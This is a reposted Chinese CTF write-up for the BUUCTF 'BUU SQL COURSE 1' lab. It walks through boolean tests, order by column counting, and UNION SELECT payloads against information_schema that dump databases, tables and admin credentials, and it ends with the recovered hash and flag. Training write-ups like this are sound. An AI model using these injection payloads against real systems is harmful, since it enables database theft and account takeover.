广告

扫码关注官方微信

扫码下载APP
返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >BUU SQL COURSE 1 1(SQL注入)
  • 224

0
分享到

BUU SQL COURSE 1 1(SQL注入)

sqlphpweb渗透CTF数据库 2023-09-11 08:09:04 224人浏览 独家记忆
摘要

题目链接 https://buuoj.cn/challenges 思路 我们先看登录界面,然后试一下各种万能密码,发现并没有用 然后我们点开热点中的热点一,我们发现这里有一个PHP的请求,于是我们猜

题目链接

https://buuoj.cn/challenges

思路

我们先看登录界面,然后试一下各种万能密码,发现并没有用

在这里插入图片描述

然后我们点开热点中的热点一,我们发现这里有一个PHP的请求,于是我们猜测是否这里会有sql注入,于是我们开始尝试

在这里插入图片描述
开始测试
Http://98b868b9-ddcf-4645-951c-274472fae642.node4.buuoj.cn:81/backend/content_detail.php?id=1%20and%201=1,发现还是正常的数据
在这里插入图片描述

http://98b868b9-ddcf-4645-951c-274472fae642.node4.buuoj.cn:81/backend/content_detail.php?id=1%20and%201=2

发现此时,数据就不回显了,那么很显然这里存在sql注入

在这里插入图片描述
通过order by 确定数据的条数,我们发现当order by 3 的时候,数据不在回显,而当数字小于等于 2 2 2 的时候会发生回显,于是数据确定为两列

在这里插入图片描述
在这里插入图片描述
接下来就是一个流程了,暴库、暴表、暴字段、爆密码

暴库:(infORMation_schema,ctftraining,Mysql,performance_schema,test,news)?id=-1 UNION SELECT 1,group_concat(schema_name) from information_schema.schemata暴表:(admin,contents)?id=-1 UNION SELECT 1,group_concat(table_name) from information_schema.tables where table_schema="news"暴字段:(id,username,passWord)?id=-1 UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name="admin"暴密码:(983a3f6bc1f3709f9f8997f887ef9803)?id=-1 UNION SELECT 1,concat(username,0x3a,password) from admin

于是我们找到了admin的密码:983a3f6bc1f3709f9f8997f887ef9803

登录账号即可获得flag

flag{614439de-3e96-45fc-bc67-10165bc60690}

在这里插入图片描述

来源地址:https://blog.csdn.net/m0_46201544/article/details/127522264

您可能感兴趣的文档:
点击免费下载>>软考高级考试备考技巧/历年真题/备考精华资料

--结束END--

本文标题: BUU SQL COURSE 1 1(SQL注入)

本文链接: https://www.lsjlt.com/news/402859.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
去做题
猜你喜欢
  • BUU SQL COURSE 1 1(SQL注入)
    题目链接 https://buuoj.cn/challenges 思路 我们先看登录界面,然后试一下各种万能密码,发现并没有用 然后我们点开热点中的热点一,我们发现这里有一个php的请求,于是我们猜...
    99+
    2023-09-11
    sql php web渗透 CTF 数据库
  • BUU SQL COURSE 1
    0x01 题目分析 通过题目可以了解到这是一个SQL注入的题,但是打开网站后观察URL、对登录框抓包尝试后都无果。    这时就很迷,最后只能用老办法看看源码啥的有没有提示  经过观察发现了一个隐藏的URL(心理想:这题是真的鬼...
    99+
    2020-12-26
    BUU SQL COURSE 1 数据库入门 数据库基础教程 数据库 mysql
  • BUUCTF--BUU UPLOAD COURSE 1
    BUUCTF–BUU UPLOAD COURSE 1 一进入本题,我们先尝试上传文件,发现我们无论上传什么文件都会上传成功。我们尝试直接上传 shell.php 文件,上传成功,但在访问的时候发现: ...
    99+
    2023-09-22
    php 安全 web安全
  • SQL注入GetShell的方法(1)
    目录 一、注入条件 二、注入相关函数和语句 三、联合写入 四、分隔符写入 五、日志写入 六、堆叠写入 七、--os-shell 一、注入条件 使用sql注入进行文件上传功能获取getshell,它有以下三个条件 最高用户权限 root...
    99+
    2023-09-01
    sql 数据库 mysql
  • 遇见SQL(1)
    SQL自学笔记 SQL的自我介绍 SQL分类的画图演示     DDL 操作数据库 1.0 查询和创建       2.0 修改、删除、使用   操作表 1.0 查询 e 2.创建       3.删除 4.修改 ...
    99+
    2017-12-31
    遇见SQL(1)
  • SQL中“where 1=1”的用法
    这篇文章给大家分享的是有关SQL中“where 1=1”的用法的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。SQL中where 1=1的用处解释:其实,1=1...
    99+
    2022-10-18
  • SQL Server笔记1
    数据库引擎是由SQL Server提供的核心服务,允许用户存储、检索、处理和保护数据安全。数据库引擎服务 使用户能够构建高性能的联机事务处理应用系统和支持联机分析处理。存储引擎 是SQL Server数据库...
    99+
    2022-10-18
  • 3-1 SQL Server 2005的
      第3章      事务处理,并发控制及数据库优化 l        SQL Server 2005的事务处理 l        SQL Server 2005的并发控制 l        SQL ...
    99+
    2023-01-31
    SQL Server
  • Sql-labs靶场(1~28)
    文章目录 简介Less-1 '闭合Less-2 数字型无闭合字符Less-3 ')闭合Less-4 ")闭合Less-5报错注入 '闭合Less-6报错注入"闭合Less-7写马注入Less-...
    99+
    2023-09-18
    sql 数据库 mysql 网络安全
  • 常用SQL语句(1)
    Createtable#tmp(uuidint,cNamenvarchar(50))insertinto#tmpvalues(1,'苹果')insertinto#tmpvalues(2,'葡萄')...
    99+
    2022-10-18
  • 数据库sql优化1
    为什么要优化:     随着实际项目的启动,数据库经过一段时间的运行,最初的数据库设置,会与实际数据库运行性能会有一些差异,这时我们就需要做一个优化调整。数据库优化这个课题较大...
    99+
    2022-10-18
  • sql语句中where 1=1的作用是什么
    sql语句中where 1=1的作用是什么,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。 在看程序...
    99+
    2022-10-18
  • 1.sql数据处理问题
    1.查询出每门课都大于 80 分的学生姓名create table test2( id int not null auto_increment, ...
    99+
    2022-10-18
  • 如何进行sql where 1=1的优缺点分析
    如何进行sql where 1=1的优缺点分析,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。一、不用where 1=1...
    99+
    2022-10-19
  • SQL语句中where 1=1指的是什么意思
    小编给大家分享一下SQL语句中where 1=1指的是什么意思,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!sql语句...
    99+
    2022-10-18
  • SQL注入
                     &...
    99+
    2022-10-18
  • SELECT 1 FROM TABLE,SQL语句中的1代表什么意思
    select 1 from table; 与 select anycol(目的表集合中的任意一行)from table; 与 select from table;从作用上来说...
    99+
    2022-10-18
  • SQL语句中Where条件后写上1=1是什么意思
    这篇文章主要讲解了“SQL语句中Where条件后写上1=1是什么意思”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“SQL语句中Where...
    99+
    2022-10-18
  • sql注入 --显错注入
    前提知识 数据库:就是将大量数据把保存起来,通过计算机加工而成的可以高效访问数据库的数据集合数据库结构:库:就是一堆表组成的数据集合表:类似 Excel,由行和列组成的二维表字段:表中的列称为字段记录:表中的行称为记录单元格:行和列相交的地...
    99+
    2021-01-16
    sql注入 --显错注入 数据库入门 数据库基础教程 数据库 mysql
  • pikachu---SQL注入
    1、产生原因 SQL注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。 2、攻击流程 3、注入点类型 ...
    99+
    2014-12-28
    pikachu---SQL注入 数据库入门 数据库基础教程
软考高级职称资格查询
软考职称历年真题下载
软考职称资料下载
热门wiki
近期文章
推荐阅读
热门问答
热门标签
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。

  • 官方手机版

  • 微信公众号

  • 商务合作